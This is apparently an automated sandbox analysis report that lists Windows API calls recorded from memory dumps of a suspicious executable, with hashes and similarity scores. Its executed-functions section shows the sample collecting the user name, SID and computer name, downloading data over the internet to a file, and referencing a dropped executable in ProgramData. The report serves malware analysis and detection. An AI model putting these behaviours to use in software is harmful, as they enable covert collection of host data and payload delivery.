                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _strrchr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3213747228-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _strrchr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3213747228-0
                                                                                                                                            • Opcode ID: 3a33277c20ef2f757225e29764f1ed4dd8dd423544d1de7bd7189e65f71147ea
                                                                                                                                            • Instruction ID: 560596ec7e37f14c04316295b7cb4fd2eae0d342fd8a579eee232b68144b6b6c
                                                                                                                                            • Opcode Fuzzy Hash: 3a33277c20ef2f757225e29764f1ed4dd8dd423544d1de7bd7189e65f71147ea
                                                                                                                                            • Instruction Fuzzy Hash: 7AB10272A102459FDB119F28C8817FFBBE5EF55340F2441AFE8549B341DA3C9982CB69
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 0212083E
                                                                                                                                            • _free.LIBCMT ref: 02120867
                                                                                                                                            • SetEndOfFile.KERNEL32(00000000,0211CC55,00000000,021155AE,?,?,?,?,?,?,?,0211CC55,021155AE,00000000), ref: 02120899
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,0211CC55,021155AE,00000000,?,?,?,?,00000000), ref: 021208B5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFileLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1547350101-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 004205EE
                                                                                                                                            • _free.LIBCMT ref: 00420617
                                                                                                                                            • SetEndOfFile.KERNEL32(00000000,0041CA05,00000000,?,?,?,?,?,?,?,?,0041CA05,?,00000000), ref: 00420649
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,0041CA05,?,00000000,?,?,?,?,?), ref: 00420665
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFileLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1547350101-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetVersionExW.KERNEL32(0000011C,?,?,00000000), ref: 00403F36
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Version
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1889659487-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 02111797: _free.LIBCMT ref: 021117A5
                                                                                                                                              • Part of subcall function 0211AEEB: WideCharToMultiByte.KERNEL32(02103D40,00000000,0042CEB8,00000000,02103D40,02103D40,02117EF7,?,0042CEB8,?,00000000,?,02117C66,0000FDE9,00000000,?), ref: 0211AF8D
                                                                                                                                            • GetLastError.KERNEL32 ref: 02119F7C
                                                                                                                                            • __dosmaperr.LIBCMT ref: 02119F83
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 02119FC2
                                                                                                                                            • __dosmaperr.LIBCMT ref: 02119FC9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 167067550-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00411547: _free.LIBCMT ref: 00411555
                                                                                                                                              • Part of subcall function 0041AC9B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00420090,?,00000000,00000000), ref: 0041AD3D
                                                                                                                                            • GetLastError.KERNEL32 ref: 00419D2C
                                                                                                                                            • __dosmaperr.LIBCMT ref: 00419D33
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00419D72
                                                                                                                                            • __dosmaperr.LIBCMT ref: 00419D79
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 167067550-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,02111715,?,?,?,?,02112382,?), ref: 02116007
                                                                                                                                            • _free.LIBCMT ref: 02116064
                                                                                                                                            • _free.LIBCMT ref: 0211609A
                                                                                                                                            • SetLastError.KERNEL32(00000000,0042E0F8,000000FF,?,?,02111715,?,?,?,?,02112382,?), ref: 021160A5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2283115069-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,004114C5,?,?,?,?,00412132,?), ref: 00415DB7
                                                                                                                                            • _free.LIBCMT ref: 00415E14
                                                                                                                                            • _free.LIBCMT ref: 00415E4A
                                                                                                                                            • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,004114C5,?,?,?,?,00412132,?), ref: 00415E55
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2283115069-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,0211231C,02115737,?,?,021147F3), ref: 0211615E
                                                                                                                                            • _free.LIBCMT ref: 021161BB
                                                                                                                                            • _free.LIBCMT ref: 021161F1
                                                                                                                                            • SetLastError.KERNEL32(00000000,0042E0F8,000000FF,?,?,0211231C,02115737,?,?,021147F3), ref: 021161FC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2283115069-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,004120CC,004154E7,?,?,004145A3), ref: 00415F0E
                                                                                                                                            • _free.LIBCMT ref: 00415F6B
                                                                                                                                            • _free.LIBCMT ref: 00415FA1
                                                                                                                                            • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,004120CC,004154E7,?,?,004145A3), ref: 00415FAC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2283115069-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,021169B1,00000000,?,0211D315,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 02116862
                                                                                                                                            • GetLastError.KERNEL32(?,0211D315,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,021169B1,00000000,00000104,?), ref: 0211686C
                                                                                                                                            • __dosmaperr.LIBCMT ref: 02116873
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2398240785-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,021169B1,00000000,?,0211D2A0,00000000,00000000,021169B1,?,?,00000000,00000000,00000001), ref: 021168CB
                                                                                                                                            • GetLastError.KERNEL32(?,0211D2A0,00000000,00000000,021169B1,?,?,00000000,00000000,00000001,00000000,00000000,?,021169B1,00000000,00000104), ref: 021168D5
                                                                                                                                            • __dosmaperr.LIBCMT ref: 021168DC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2398240785-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • WriteConsoleW.KERNEL32(02103D40,?,0042CEB8,00000000,02103D40,?,0211E0DF,02103D40,00000001,02103D40,02103D40,?,0211793C,00000000,?,02103D40), ref: 02120CAC
                                                                                                                                            • GetLastError.KERNEL32(?,0211E0DF,02103D40,00000001,02103D40,02103D40,?,0211793C,00000000,?,02103D40,00000000,02103D40,?,02117E90,02103D40), ref: 02120CB8
                                                                                                                                              • Part of subcall function 02120C7E: CloseHandle.KERNEL32(0042E930,02120CC8,?,0211E0DF,02103D40,00000001,02103D40,02103D40,?,0211793C,00000000,?,02103D40,00000000,02103D40), ref: 02120C8E
                                                                                                                                            • ___initconout.LIBCMT ref: 02120CC8
                                                                                                                                              • Part of subcall function 02120C40: CreateFileW.KERNEL32(0042AFE4,40000000,00000003,00000000,00000003,00000000,00000000,02120C6F,0211E0CC,02103D40,?,0211793C,00000000,?,02103D40,00000000), ref: 02120C53
                                                                                                                                            • WriteConsoleW.KERNEL32(02103D40,?,0042CEB8,00000000,?,0211E0DF,02103D40,00000001,02103D40,02103D40,?,0211793C,00000000,?,02103D40,00000000), ref: 02120CDD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2744216297-0
                                                                                                                                            • Opcode ID: fa8bd8c12c7a88df13905f5eddcf1dd08d9ba8f59b07f20002aad9ac96aeefa0
                                                                                                                                            • Instruction ID: 0ccccebbb6028ee84ebbbecb4260a53a7cb82b0b4dcff43a26ad06849ec4dd9e
                                                                                                                                            • Opcode Fuzzy Hash: fa8bd8c12c7a88df13905f5eddcf1dd08d9ba8f59b07f20002aad9ac96aeefa0
                                                                                                                                            • Instruction Fuzzy Hash: D9F01C76640128BBCF225F96DC04A897F66FF087A1B414160FA1985130D7328875AB94
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • WriteConsoleW.KERNEL32(00403AF0,?,0042CEB8,00000000,00403AF0,?,0041DE8F,00403AF0,00000001,00403AF0,00403AF0,?,004176EC,00000000,?,00403AF0), ref: 00420A5C
                                                                                                                                            • GetLastError.KERNEL32(?,0041DE8F,00403AF0,00000001,00403AF0,00403AF0,?,004176EC,00000000,?,00403AF0,00000000,00403AF0,?,00417C40,00403AF0), ref: 00420A68
                                                                                                                                              • Part of subcall function 00420A2E: CloseHandle.KERNEL32(FFFFFFFE,00420A78,?,0041DE8F,00403AF0,00000001,00403AF0,00403AF0,?,004176EC,00000000,?,00403AF0,00000000,00403AF0), ref: 00420A3E
                                                                                                                                            • ___initconout.LIBCMT ref: 00420A78
                                                                                                                                              • Part of subcall function 004209F0: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00420A1F,0041DE7C,00403AF0,?,004176EC,00000000,?,00403AF0,00000000), ref: 00420A03
                                                                                                                                            • WriteConsoleW.KERNEL32(00403AF0,?,0042CEB8,00000000,?,0041DE8F,00403AF0,00000001,00403AF0,00403AF0,?,004176EC,00000000,?,00403AF0,00000000), ref: 00420A8D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2744216297-0
                                                                                                                                            • Opcode ID: fa8bd8c12c7a88df13905f5eddcf1dd08d9ba8f59b07f20002aad9ac96aeefa0
                                                                                                                                            • Instruction ID: a013aed45aa20be437475b0026bfe262562a16a8948ae9efbea31755940ae5c1
                                                                                                                                            • Opcode Fuzzy Hash: fa8bd8c12c7a88df13905f5eddcf1dd08d9ba8f59b07f20002aad9ac96aeefa0
                                                                                                                                            • Instruction Fuzzy Hash: A0F03736700129BBCF325FD5EC0598E7F65FF147A1F814025FA1885131D6318861EB9C
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0041A5CE: GetOEMCP.KERNEL32(00000000,0041A840,?,?,2!A,00412132,?), ref: 0041A5F9
                                                                                                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,2!A,0041A887,?,00000000,?,?,?,?,?,?,00412132), ref: 0041AA97
                                                                                                                                            • GetCPInfo.KERNEL32(00000000,0041A887,?,2!A,0041A887,?,00000000,?,?,?,?,?,?,00412132,?), ref: 0041AAD9
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CodeInfoPageValid
                                                                                                                                            • String ID: 2!A
                                                                                                                                            • API String ID: 546120528-1441434633
                                                                                                                                            • Opcode ID: 855e5094346b95d4b4db1da98e09477af5f802b7c2a014dd2a795b6dfe79976d
                                                                                                                                            • Instruction ID: 2fbf1acdb1644f5cebe7d70d344e6b9978f84c8fc5be97901e81be94f95da629
                                                                                                                                            • Opcode Fuzzy Hash: 855e5094346b95d4b4db1da98e09477af5f802b7c2a014dd2a795b6dfe79976d
                                                                                                                                            • Instruction Fuzzy Hash: BD511470A052849EDB21CF76C4406FBBBF6EF41304F14446FD1868B252E77CA59ACB9A
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe
                                                                                                                                            • API String ID: 0-2322989060
                                                                                                                                            • Opcode ID: a41690f532066a8b71b9e286dfa568cd4f83670d9d2d2647161a3b7c6b7cbf70
                                                                                                                                            • Instruction ID: 8f212296e9c110a0be9fd48788962f7849d87c479075583da3108dfae5c01f24
                                                                                                                                            • Opcode Fuzzy Hash: a41690f532066a8b71b9e286dfa568cd4f83670d9d2d2647161a3b7c6b7cbf70
                                                                                                                                            • Instruction Fuzzy Hash: EE4191B1A80214AFCB25DF9ADC80AEFBBF9EF89B10F550076E414A7250D7718A45CB91
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0041A5CE: GetOEMCP.KERNEL32(00000000,0041A840,?,?,2!A,00412132,?), ref: 0041A5F9
                                                                                                                                            • _free.LIBCMT ref: 0041A89D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free
                                                                                                                                            • String ID: 2!A
                                                                                                                                            • API String ID: 269201875-1441434633
                                                                                                                                            • Opcode ID: 9c2c00ac15ece1745d97c0fca12c4d45e076aae10a1d0af358e82324bd06995b
                                                                                                                                            • Instruction ID: 8fc8c036d32de9612cf7c31c04d913b2c1a5afb910598d1080d20a8abe594b57
                                                                                                                                            • Opcode Fuzzy Hash: 9c2c00ac15ece1745d97c0fca12c4d45e076aae10a1d0af358e82324bd06995b
                                                                                                                                            • Instruction Fuzzy Hash: F531E371900249AFDB01EF69D840BEB7BF4EF80314F11406AF91497291D77A9DA2CB59
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetOEMCP.KERNEL32(00000000,0041A840,?,?,2!A,00412132,?), ref: 0041A5F9
                                                                                                                                            • GetACP.KERNEL32(00000000,0041A840,?,?,2!A,00412132,?), ref: 0041A610
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 2!A
                                                                                                                                            • API String ID: 0-1441434633
                                                                                                                                            • Opcode ID: 26c0676f71b8d74d44ffd1cd88890f61d5a8aa5f38128eb00bcd6bd1647cb703
                                                                                                                                            • Instruction ID: 1e92f9a8aadae32bac15e37fb92d95dc9b840e940613ad1b39aa9e2a43853cf2
                                                                                                                                            • Opcode Fuzzy Hash: 26c0676f71b8d74d44ffd1cd88890f61d5a8aa5f38128eb00bcd6bd1647cb703
                                                                                                                                            • Instruction Fuzzy Hash: 97F0AF70901104CBD720CBA5D8087E937B0EB10339F984726E465CA2E1CB75989ACF4E
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Executed Functions

                                                                                                                                            APIs
                                                                                                                                            • GetUserNameW.ADVAPI32(00000000,004049C3), ref: 00401C4A
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,004049C3), ref: 00401C5F
                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401C62
                                                                                                                                            • GetUserNameW.ADVAPI32(00000000,004049C3), ref: 00401C70
                                                                                                                                            • LookupAccountNameW.ADVAPI32(00000000,?,00000000,004049C3,00000000,?,?), ref: 00401C93
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,004049C3), ref: 00401C9E
                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401CA1
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?), ref: 00401CB1
                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401CB4
                                                                                                                                            • LookupAccountNameW.ADVAPI32(00000000,?,00000000,004049C3,00000000,?,?), ref: 00401CDE
                                                                                                                                            • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00401CF1
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00401D82
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401D8B
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401D90
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401D93
                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401D9A
                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401D9D
                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00401DA2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3326663573-0
                                                                                                                                            • Opcode ID: 89de7c59b90efd946aa68e8c02d9ab6001ee340a7ba4baf79da18d253d2d0f44
                                                                                                                                            • Instruction ID: 5d740cbccbc7aecd9424c2ab973b1f5715f8ce92cc64a7cb0e2c3ceeedde85f2
                                                                                                                                            • Opcode Fuzzy Hash: 89de7c59b90efd946aa68e8c02d9ab6001ee340a7ba4baf79da18d253d2d0f44
                                                                                                                                            • Instruction Fuzzy Hash: 04516075E00209ABDB20DFA5CC84FAFBBBDEF44344F15456AE905A3250EB749E05CBA4
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • __fread_nolock.LIBCMT ref: 00405AAF
                                                                                                                                            • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,73B76490,00000000,-00000012), ref: 00405BC5
                                                                                                                                            • InternetOpenA.WININET(0042BC85,00000000,00000000,00000000,00000000), ref: 00405BDA
                                                                                                                                            • InternetOpenUrlA.WININET(00000000,0040708E,00000000,00000000,00000000,00000000), ref: 00405BFA
                                                                                                                                            • InternetReadFile.WININET(00000000,?,00010000,00010000), ref: 00405C11
                                                                                                                                            • WriteFile.KERNELBASE(00000000,?,00010000,?,00000000), ref: 00405C37
                                                                                                                                            • InternetReadFile.WININET(00000000,?,00010000,00010000), ref: 00405C48
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00405C53
                                                                                                                                            • InternetCloseHandle.WININET(0040708E), ref: 00405C62
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00405C65
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Internet$File$CloseHandle$OpenRead$CreateWrite__fread_nolock
                                                                                                                                            • String ID: jjh$jjj$jjjj
                                                                                                                                            • API String ID: 350641714-3331015499
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00403C30: GetVersionExW.KERNEL32(0000011C,?,?,?), ref: 00403C86
                                                                                                                                              • Part of subcall function 00403EE0: GetVersionExW.KERNEL32(0000011C,?,?,00000000), ref: 00403F36
                                                                                                                                              • Part of subcall function 00401C20: GetUserNameW.ADVAPI32(00000000,004049C3), ref: 00401C4A
                                                                                                                                              • Part of subcall function 00401C20: GetProcessHeap.KERNEL32(00000008,004049C3), ref: 00401C5F
                                                                                                                                              • Part of subcall function 00401C20: HeapAlloc.KERNEL32(00000000), ref: 00401C62
                                                                                                                                              • Part of subcall function 00401C20: GetUserNameW.ADVAPI32(00000000,004049C3), ref: 00401C70
                                                                                                                                              • Part of subcall function 00401C20: LookupAccountNameW.ADVAPI32(00000000,?,00000000,004049C3,00000000,?,?), ref: 00401C93
                                                                                                                                              • Part of subcall function 00401C20: GetProcessHeap.KERNEL32(00000008,004049C3), ref: 00401C9E
                                                                                                                                              • Part of subcall function 00401C20: HeapAlloc.KERNEL32(00000000), ref: 00401CA1
                                                                                                                                              • Part of subcall function 00401C20: GetProcessHeap.KERNEL32(00000008,?), ref: 00401CB1
                                                                                                                                              • Part of subcall function 00401C20: HeapAlloc.KERNEL32(00000000), ref: 00401CB4
                                                                                                                                              • Part of subcall function 00401C20: LookupAccountNameW.ADVAPI32(00000000,?,00000000,004049C3,00000000,?,?), ref: 00401CDE
                                                                                                                                              • Part of subcall function 00401C20: ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00401CF1
                                                                                                                                            • LoadLibraryA.KERNEL32(00000000), ref: 0040B09A
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,000002A8), ref: 0040B0F4
                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 0040B0FF
                                                                                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 0040B134
                                                                                                                                            • GetComputerNameExW.KERNEL32(00000002,?,00000100,00000000,?,?), ref: 0040B214
                                                                                                                                              • Part of subcall function 0040DCC0: Concurrency::cancel_current_task.LIBCPMT ref: 0040DD74
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HeapName$AllocProcessUser$AccountLibraryLookupVersion$AddressComputerConcurrency::cancel_current_taskConvertFreeLoadProcString
                                                                                                                                            • String ID: 152138533219$6b3c86
                                                                                                                                            • API String ID: 1144133639-628519087
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 0041C770: CreateFileW.KERNELBASE(00000000,00000000,?,0041CB60,?,?,00000000,?,0041CB60,00000000,0000000C), ref: 0041C78D
                                                                                                                                            • GetLastError.KERNEL32 ref: 0041CBCB
                                                                                                                                            • __dosmaperr.LIBCMT ref: 0041CBD2
                                                                                                                                            • GetFileType.KERNELBASE(00000000), ref: 0041CBDE
                                                                                                                                            • GetLastError.KERNEL32 ref: 0041CBE8
                                                                                                                                            • __dosmaperr.LIBCMT ref: 0041CBF1
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0041CC11
                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0041CD5E
                                                                                                                                            • GetLastError.KERNEL32 ref: 0041CD90
                                                                                                                                            • __dosmaperr.LIBCMT ref: 0041CD97
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.922526659.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.922732648.0000000000431000.00000040.00020000.sdmp
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4237864984-0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00403C30: GetVersionExW.KERNEL32(0000011C,?,?,?), ref: 00403C86
                                                                                                                                              • Part of subcall function 00403EE0: GetVersionExW.KERNEL32(0000011C,?,?,00000000), ref: 00403F36
